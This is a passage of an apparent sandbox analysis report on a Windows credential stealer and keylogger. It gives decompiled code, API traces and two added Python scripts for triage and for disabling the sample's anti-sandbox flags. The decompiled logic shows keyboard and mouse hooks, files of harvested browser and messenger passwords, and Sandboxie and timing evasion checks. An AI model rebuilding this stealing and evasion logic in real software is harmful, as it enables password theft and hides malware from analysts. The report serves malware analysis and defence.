                                    						E00406008( &_v92);
                                    						E00401D58( &_v92, "XX--XX--XX.txt");
                                    						E0040B93C( *0x40f1e8, _t212, _v92, _t254, _t255, __eflags);
                                    						_t80 =  *0x40d214; // 0x40e8f4
                                    						__eflags =  *_t80 - 1;
                                    						if(__eflags == 0) {
                                    							E0040B7FC(_t212, _t254, _t255, __eflags);
                                    							Sleep(0x3e8); // executed
                                    						}
                                    						E0040B3C0(_t212, _t213, _t254, _t255); // executed
                                    						L43:
                                    						_pop(_t229);
                                    						 *[fs:eax] = _t229;
                                    						_push(0x40c0cb);
                                    						return E00401AE4( &_v92, 0x12);
                                    					}
                                    					CloseHandle(_t211);
                                    					_t114 =  *0x40e670; // 0x400000
                                    					SetWindowsHookExA(0xd, E0040B0B8, _t114, 0);
                                    					_t117 =  *0x40e670; // 0x400000
                                    					SetWindowsHookExA(0xe, E0040B108, _t117, 0);
                                    					while(1) {
                                    						_t120 = E0040BA84(__eflags);
                                    						__eflags = _t120;
                                    						if(_t120 != 0) {
                                    							break;
                                    						}
                                    						E00405918();
                                    					}
                                    					ExitProcess(0);
                                    					goto L26;
                                    				}
                                    				CloseHandle(_t210);
                                    				E00409AD4( &_v24, _t210, _t255, _t261);
                                    				E00401B14(0x40f1ec, _v24);
                                    				_t262 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v28);
                                    					E00401D58( &_v28, "NOIP.abc");
                                    					_pop(_t222);
                                    					E00405D70(_v28, _t210, _t222,  *0x40f1ec, _t255, _t262);
                                    				}
                                    				E00409D28( &_v32, _t210, _t254, _t255);
                                    				_t235 = _v32;
                                    				E00401B14(0x40f1ec, _v32);
                                    				_t263 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v36);
                                    					E00401D58( &_v36, "MSN.abc");
                                    					_t235 =  *0x40f1ec;
                                    					_pop(_t221);
                                    					E00405D70(_v36, _t210, _t221,  *0x40f1ec, _t255, _t263);
                                    				}
                                    				E00409EF8( &_v40, _t210, _t235, _t254, _t255);
                                    				E00401B14(0x40f1ec, _v40);
                                    				_t264 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v44);
                                    					E00401D58( &_v44, "FIREFOX.abc");
                                    					_pop(_t220);
                                    					E00405D70(_v44, _t210, _t220,  *0x40f1ec, _t255, _t264);
                                    				}
                                    				E00409A84( &_v48);
                                    				E00401B14(0x40f1ec, _v48);
                                    				_t265 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v52);
                                    					E00401D58( &_v52, "IELOGIN.abc");
                                    					_pop(_t219);
                                    					E00405D70(_v52, _t210, _t219,  *0x40f1ec, _t255, _t265);
                                    				}
                                    				E00409A90( &_v56);
                                    				E00401B14(0x40f1ec, _v56);
                                    				_t266 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v60);
                                    					E00401D58( &_v60, "IEPASS.abc");
                                    					_pop(_t218);
                                    					E00405D70(_v60, _t210, _t218,  *0x40f1ec, _t255, _t266);
                                    				}
                                    				E00409A9C( &_v64, _t254, _t255, _t266, _t270);
                                    				E00401B14(0x40f1ec, _v64);
                                    				_t267 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v68);
                                    					E00401D58( &_v68, "IEAUTO.abc");
                                    					_pop(_t217);
                                    					E00405D70(_v68, _t210, _t217,  *0x40f1ec, _t255, _t267);
                                    				}
                                    				E00409AB8( &_v72, _t254, _t255, _t267);
                                    				E00401B14(0x40f1ec, _v72);
                                    				_t268 =  *0x40f1ec;
                                    				if( *0x40f1ec != 0) {
                                    					_push(E00401D50( *0x40f1ec));
                                    					E00406008( &_v76);
                                    					E00401D58( &_v76, "IEWEB.abc");
                                    					_pop(_t216);
                                    					E00405D70(_v76, _t210, _t216,  *0x40f1ec, _t255, _t268);
                                    				}
                                    				goto L43;
                                    			}
                                    Instruction address column for the C-code above: 0x0040bbf4 to 0x0040c0c3

                                    APIs
                                    • GetLastError.KERNEL32(00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC2C
                                    • CloseHandle.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC39
                                    • Sleep.KERNEL32(00002EE0,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC43
                                    • CloseHandle.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC4B
                                      • Part of subcall function 00405D70: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DB6
                                      • Part of subcall function 00405D70: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DCE
                                      • Part of subcall function 00405D70: WriteFile.KERNEL32(00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DE4
                                      • Part of subcall function 00405D70: CloseHandle.KERNEL32(00000000,00000000,00000000,?,?,00000000,00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DEA
                                    • GetLastError.KERNEL32(00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC60
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC71
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BE9B
                                      • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEB0
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEBD
                                    • SetWindowsHookExA.USER32(0000000D,Function_0000B0B8,00400000,00000000), ref: 0040BED2
                                    • SetWindowsHookExA.USER32(0000000E,Function_0000B108,00400000,00000000), ref: 0040BEE7
                                      • Part of subcall function 0040BA84: GetLastError.KERNEL32(00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BA95
                                      • Part of subcall function 0040BA84: CloseHandle.KERNEL32(00000000,00000000,0040BEF8,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BAA2
                                    • ExitProcess.KERNEL32(00000000,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEFE
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF06
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF2C
                                    • GetLastError.KERNEL32(00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF58
                                    • CloseHandle.KERNEL32(00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF69
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF73
                                    • GetLastError.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF90
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFA1
                                    • Sleep.KERNEL32(000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFAB
                                    • GetLastError.KERNEL32(000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFC8
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFD5
                                    • Sleep.KERNEL32(000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFDF
                                    • GetLastError.KERNEL32(000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BFFC
                                    • ExitProcess.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C00A
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C012
                                    • CloseHandle.KERNEL32(00000000,000003E8,00000000,000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C01A
                                    • Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040C09F
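The API list above is dense but mechanical, so it can be triaged by script. The following is an added example, not part of the Joe Sandbox report: it parses lines of the form "API.MODULE(args), ref: ADDR" (including the indented "Part of subcall function" entries) and flags what a reviewer looks for in this sample, namely the SetWindowsHookExA calls with idHook 13 and 14 (WH_KEYBOARD_LL and WH_MOUSE_LL, the low-level keyboard and mouse hooks behind the "register a low level keyboard hook" signature), the Sleep durations, CreateFileA opened for writing with CREATE_ALWAYS, the mutex, and ExitProcess. The constants are the documented Windows SDK values; the rule set is the editor's; the sample lines are copied from the report.

```python
"""Triage helper for Joe Sandbox API lists (added example, not report output)."""
import re
from dataclasses import dataclass
from typing import List, Optional

# Windows SDK constants the sample passes.
HOOK_IDS = {13: "WH_KEYBOARD_LL", 14: "WH_MOUSE_LL"}
GENERIC_WRITE = 0x40000000
CREATE_ALWAYS = 2

# "• API.MODULE(a,b,...), ref: ADDR"; subcall entries carry a prefix naming the caller.
LINE_RE = re.compile(
    r"^\W*(?:Part of subcall function (?P<caller>[0-9A-Fa-f]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)


@dataclass
class Call:
    api: str
    module: str
    raw: List[str]             # argument tokens exactly as printed
    args: List[Optional[int]]  # hex tokens decoded; None for '?' or symbolic names
    ref: str                   # address of the call instruction
    caller: Optional[str]      # set for "Part of subcall function" entries


def parse_arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else None


def parse_trace(text: str) -> List[Call]:
    calls = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # headings, blank lines, anything that is not an API entry
        raw = [t.strip() for t in m["args"].split(",")] if m["args"].strip() else []
        calls.append(Call(m["api"], m["module"], raw, [parse_arg(t) for t in raw],
                          m["ref"], m["caller"]))
    return calls


def triage(calls: List[Call]) -> List[str]:
    findings = []
    for c in calls:
        if c.api == "SetWindowsHookExA" and c.args and c.args[0] in HOOK_IDS:
            # idHook 13/14 with hMod 0x00400000 (the sample's own image base): a
            # process-wide keyboard or mouse tap whose handler lives inside the sample.
            findings.append(f"{c.ref}: {HOOK_IDS[c.args[0]]} hook, handler {c.raw[1]} "
                            f"in module {c.raw[2]}")
        elif c.api == "Sleep" and c.args and c.args[0] is not None:
            findings.append(f"{c.ref}: Sleep({c.args[0]} ms)")
        elif c.api == "CreateFileA" and len(c.args) >= 5 and c.args[1] is not None:
            if c.args[1] & GENERIC_WRITE and c.args[4] == CREATE_ALWAYS:
                findings.append(f"{c.ref}: CreateFileA GENERIC_WRITE + CREATE_ALWAYS "
                                f"(drops or overwrites a file)")
        elif c.api == "CreateMutexA":
            findings.append(f"{c.ref}: CreateMutexA (single-instance marker; the name is "
                            f"an IOC once recovered)")
        elif c.api == "ExitProcess":
            findings.append(f"{c.ref}: ExitProcess")
    return findings


# Lines copied from the report's API list for this function.
SAMPLE_TRACE = """
• Sleep.KERNEL32(00002EE0,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BC43
  • Part of subcall function 00405D70: CreateFileA.KERNEL32(00000000,40000000,00000002,00000000,00000002,00000000,00000000,00000000,00405E0A), ref: 00405DB6
  • Part of subcall function 00403568: CreateMutexA.KERNEL32(?,?,?,?,?), ref: 0040357E
• SetWindowsHookExA.USER32(0000000D,Function_0000B0B8,00400000,00000000), ref: 0040BED2
• SetWindowsHookExA.USER32(0000000E,Function_0000B108,00400000,00000000), ref: 0040BEE7
• ExitProcess.KERNEL32(00000000,0000000E,Function_0000B108,00400000,00000000,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BEFE
• Sleep.KERNEL32(000003E8,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040BF2C
"""

if __name__ == "__main__":
    for finding in triage(parse_trace(SAMPLE_TRACE)):
        print(finding)
```

Run against the whole API list of the report, the output gives the hook installation, the 12000 ms (0x2EE0) and 1000 ms (0x3E8) sleeps, and the file writes at a glance; the mutex name itself is not in the trace (arguments are shown as ?) and has to be taken from the behaviour section of the report.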
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: CloseHandle$ErrorLast$Sleep$File$CreateExitHookProcessWindows$MutexPointerWrite
                                    • String ID: FIREFOX.abc$IEAUTO.abc$IELOGIN.abc$IEPASS.abc$IEWEB.abc$MSN.abc$NOIP.abc$Restart$XX--XX--XX.txt$_x_X_BLOCKMOUSE_X_x_$_x_X_PASSWORDLIST_X_x_$_x_X_UPDATE_X_x_
                                    • API String ID: 3001352634-1131808598
                                    • Opcode ID: 62af1ef2336ec2e1ff34df4ac233d62ff794d0106d834388617ccd72b51add9f
                                    • Instruction ID: bdf70af56670c6b0a4a77e5acd908e49726916f33cb45a25643fdd496cb3d72a
                                    • Opcode Fuzzy Hash: 62af1ef2336ec2e1ff34df4ac233d62ff794d0106d834388617ccd72b51add9f
                                    • Instruction Fuzzy Hash: 36C10130640244EADB10FBA6DC82B9D77689F45309F50453BF501BB2E2DB7CAE45CAAD
                                    Uniqueness

                                    Uniqueness Score: -1.00%

                                    C-Code - Quality: 88%
                                    			E0040B118(void* __edx, void* __edi, void* __esi) {
                                    				void* __ebx;
                                    				char* _t1;
                                    				char* _t2;
                                    				char* _t3;
                                    				char* _t4;
                                    				char* _t5;
                                    				char* _t6;
                                    				char* _t7;
                                    				char* _t8;
                                    				char* _t9;
                                    				char* _t10;
                                    				char* _t11;
                                    				char* _t12;
                                    				char* _t13;
                                    				long _t15;
                                    				void* _t49;
                                    				long _t58;
                                    				void* _t62;
                                    				void* _t63;
                                    				intOrPtr* _t64;
                                    
                                    				_t63 = __esi;
                                    				_t62 = __edi;
                                    				// Anti-analysis gate: each one-byte flag at 0x40e8e0..0x40e8eb (reached through the
                                    				// 0x40d1xx pointers) enables one check; a check that returns 1 ends the process.
                                    				_t1 =  *0x40d1d4; // 0x40e8e0
                                    				if( *_t1 == 1 && E004052EC() == 1) { // E004052EC: GetModuleHandleA("SbieDll.dll"), i.e. Sandboxie present (see APIs)
                                    					ExitProcess(0);
                                    				}
                                    				_t2 =  *0x40d1b0; // 0x40e8e1
                                    				if( *_t2 == 1 && L00405168(_t58, _t63) == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t3 =  *0x40d1fc; // 0x40e8e2
                                    				if( *_t3 == 1 && E00405124() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t4 =  *0x40d1ac; // 0x40e8e3
                                    				_t71 =  *_t4 - 1;
                                    				if( *_t4 == 1 && E004051CC(_t58, _t62, _t63, _t71) == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t5 =  *0x40d1f4; // 0x40e8e4
                                    				if( *_t5 == 1 && E00405310() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t6 =  *0x40d1c8; // 0x40e8e5
                                    				if( *_t6 == 1 && E004054A4() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t7 =  *0x40d1d0; // 0x40e8e6
                                    				if( *_t7 == 1 && E004053EC() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t8 =  *0x40d1c0; // 0x40e8e7
                                    				if( *_t8 == 1 && E00405334() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t9 =  *0x40d1f8; // 0x40e8e8
                                    				_t81 =  *_t9 - 1;
                                    				if( *_t9 == 1) {
                                    					_t49 = E0040555C(_t58, _t62, _t63, _t81); // executed
                                    					if(_t49 == 1) {
                                    						ExitProcess(0);
                                    					}
                                    				}
                                    				_t10 =  *0x40d1bc; // 0x40e8e9
                                    				if( *_t10 == 1 && E0040588C() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t11 =  *0x40d1b4; // 0x40e8ea
                                    				if( *_t11 == 1 && E004056C0() == 1) {
                                    					ExitProcess(0);
                                    				}
                                    				_t12 =  *0x40d200; // 0x40e8eb
                                    				if( *_t12 == 1) {
                                    					// Timing flag: record GetTickCount(), then run E00405750 against each check
                                    					// routine (a nonzero result also exits); the elapsed time is judged below.
                                    					_t58 = GetTickCount();
                                    					if(E00405750(L00405168) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004051CC) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004052EC) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E00405310) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E00405334) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004053EC) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004054A4) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E0040555C) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004056DC) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E00405770) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004057B4) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E0040588C) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E004056C0) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E00405750(E00405124) != 0) {
                                    						ExitProcess(0);
                                    					}
                                    					if(E004056DC(_t58) == 1) {
                                    						ExitProcess(0);
                                    					}
                                    				}
                                    				_t13 =  *0x40d200; // 0x40e8eb
                                    				if( *_t13 != 1) {
                                    					L70:
                                    					return _t13;
                                    				} else {
                                    					E00405770();
                                    					// 0x40e8eb set: compare the time spent in the checks with a fixed budget.
                                    					// GetTickCount() - _t58 is formed as a 64-bit value (cdq / sbb); the
                                    					// decompiler renders the high-dword test as the constant-folded branches below.
                                    					_t15 = GetTickCount();
                                    					_push(0);
                                    					asm("cdq");
                                    					 *_t64 =  *_t64 - _t58;
                                    					asm("sbb [esp+0x4], edx");
                                    					_t13 = _t15;
                                    					if(0 != 0) {
                                    						if(0 <= 0) {
                                    							goto L70;
                                    						}
                                    						L69:
                                    						ExitProcess(0);
                                    						return _t13;
                                    					}
                                    					if(_t13 <= 0x1388) { // 0x1388 = 5000 ms; a slower run is taken as single-stepping or emulation
                                    						goto L70;
                                    					}
                                    					goto L69;
                                    				}
                                    			}
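E0040B118 is configuration-driven: twelve one-byte flags decide which evasion checks run, and the last one arms a 5000 ms (0x1388) GetTickCount budget over the whole sequence. An analyst who has the memory dump can therefore read the flags to see which checks this build performs, and clear them to make the sample run under analysis. The script below is an added example, not part of the report or of the sample. It takes from the decompiled routine the flag addresses 0x40e8e0..0x40e8eb, the order in which they are tested, the routine each flag gates and the 0x1388 threshold, and from the APIs list the fact that E004052EC calls GetModuleHandleA("SbieDll.dll"); the meaning of the other routines is not established on this page and is left as unknown. The image it works on is constructed inline, and the offsets assume a dump mapped at the sample's image base 0x400000.

```python
"""Decode, model and neutralise the anti-analysis flags read by E0040B118 (added example)."""
from typing import Dict, List, Optional

IMAGE_BASE = 0x400000
THRESHOLD_MS = 0x1388        # 5000 ms budget for the whole check sequence
TIMING_FLAG_VA = 0x40E8EB    # enables the GetTickCount measurement and the E00405750 pass

# (flag address, check routine, meaning) in the order E0040B118 evaluates them.
# Only the first routine has a meaning the report supports (GetModuleHandleA "SbieDll.dll").
UNKNOWN = "check not identified on this page"
CHECKS = [
    (0x40E8E0, "E004052EC", 'Sandboxie: GetModuleHandleA("SbieDll.dll") succeeded'),
    (0x40E8E1, "L00405168", UNKNOWN),
    (0x40E8E2, "E00405124", UNKNOWN),
    (0x40E8E3, "E004051CC", UNKNOWN),
    (0x40E8E4, "E00405310", UNKNOWN),
    (0x40E8E5, "E004054A4", UNKNOWN),
    (0x40E8E6, "E004053EC", UNKNOWN),
    (0x40E8E7, "E00405334", UNKNOWN),
    (0x40E8E8, "E0040555C", UNKNOWN),
    (0x40E8E9, "E0040588C", UNKNOWN),
    (0x40E8EA, "E004056C0", UNKNOWN),
]
FLAG_VAS = [va for va, _, _ in CHECKS] + [TIMING_FLAG_VA]


def read_flags(image: bytes, base: int = IMAGE_BASE) -> Dict[int, int]:
    """{virtual address: flag byte} for the twelve flags; image is a dump mapped at base."""
    return {va: image[va - base] for va in FLAG_VAS}


def enabled_checks(flags: Dict[int, int]) -> List[str]:
    """Names of the check routines this configuration actually runs."""
    return [name for va, name, _ in CHECKS if flags[va] == 1]


def simulate_gate(flags: Dict[int, int], detected: Dict[str, bool],
                  elapsed_ms: int) -> Optional[str]:
    """Model of E0040B118: the first enabled check whose routine returns 1 terminates the
    process, as does exceeding the time budget when 0x40e8eb is set.  `detected` gives each
    routine's result, `elapsed_ms` is GetTickCount() after the checks minus the value read
    before them.  Simplification: the E00405750 pass over each routine and the E004056DC
    call that the real code performs under the timing flag are not modelled.
    Returns the reason for exiting, or None when the sample would continue."""
    for va, name, meaning in CHECKS:
        if flags[va] == 1 and detected.get(name, False):
            return f"{name}: {meaning}"
    if flags[TIMING_FLAG_VA] == 1 and elapsed_ms > THRESHOLD_MS:
        return f"timing: {elapsed_ms} ms exceeds the {THRESHOLD_MS} ms budget"
    return None


def neutralize(image: bytes, base: int = IMAGE_BASE) -> bytes:
    """Copy of the image with all twelve flags cleared: no check runs and the timing gate
    is skipped, so the sample proceeds even inside an instrumented environment."""
    patched = bytearray(image)
    for va in FLAG_VAS:
        patched[va - base] = 0
    return bytes(patched)


def build_sample_image() -> bytes:
    """Constructed 64 KiB image: flags for E004052EC, L00405168, E004051CC and timing set."""
    img = bytearray(0x10000)
    img[0x40E8E0 - IMAGE_BASE:0x40E8EC - IMAGE_BASE] = bytes([1, 1, 0, 1, 0, 0, 0, 0, 0, 0, 0, 1])
    return bytes(img)


if __name__ == "__main__":
    flags = read_flags(build_sample_image())
    print("enabled:", enabled_checks(flags))
    print("under Sandboxie:", simulate_gate(flags, {"E004052EC": True}, 120))
    print("slow run:", simulate_gate(flags, {}, 7000))
    fixed = read_flags(neutralize(build_sample_image()))
    print("patched:", simulate_gate(fixed, {"E004052EC": True}, 7000))
```

The 0x40e8e0 addresses come from the decompiler's annotations of the pointer values at dump time; when working from the on-disk file rather than the dump, translate them through the section table first, since the page gives only virtual addresses.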
                                    Instruction address column for the C-code above: 0x0040b118 to 0x0040b3be

                                    APIs
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B12E
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B148
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B162
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B17C
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B196
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1B0
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1CA
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1E4
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B1FE
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B218
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B232
                                    • GetTickCount.KERNEL32 ref: 0040B245
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B25C
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B271
                                      • Part of subcall function 004052EC: GetModuleHandleA.KERNEL32(SbieDll.dll,00000000,0040B128,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 004052F4
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B286
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B29B
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2B0
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2C5
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2DA
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B2EF
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B304
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B319
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B32E
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B343
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B358
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B36D
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B37D
                                    • GetTickCount.KERNEL32 ref: 0040B391
                                    • ExitProcess.KERNEL32(00000000,00000000,0040BF40,00000000,00000000,00000000,00000000,0040C0C4,?,?,00000000,00000000), ref: 0040B3B8
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000004.00000002.517435499.0000000000401000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000004.00000002.517422434.0000000000400000.00000002.00020000.sdmp
                                    • Associated: 00000004.00000002.517448285.0000000000410000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517455139.0000000000414000.00000040.00020000.sdmp
                                    • Associated: 00000004.00000002.517487223.0000000000451000.00000080.00020000.sdmp
                                    • Associated: 00000004.00000002.517498005.0000000000456000.00000004.00020000.sdmp
                                    Yara matches
                                    Similarity
                                    • API ID: ExitProcess$CountTick$HandleModule
                                    • String ID: @$@$@$@$@$@$@$@$@$@$@$@
                                    • API String ID: 835719275-1661000548
                                    • Opcode ID: 2d04ea2a89ea791a22f26319119734baed36b5ff42cd23ef58fe5dff59b77004
                                    • Instruction ID: c7fc4875350585e80c75c2e3c7c0fe252a246f454c130cd5c6e6d9ea2ff417f9
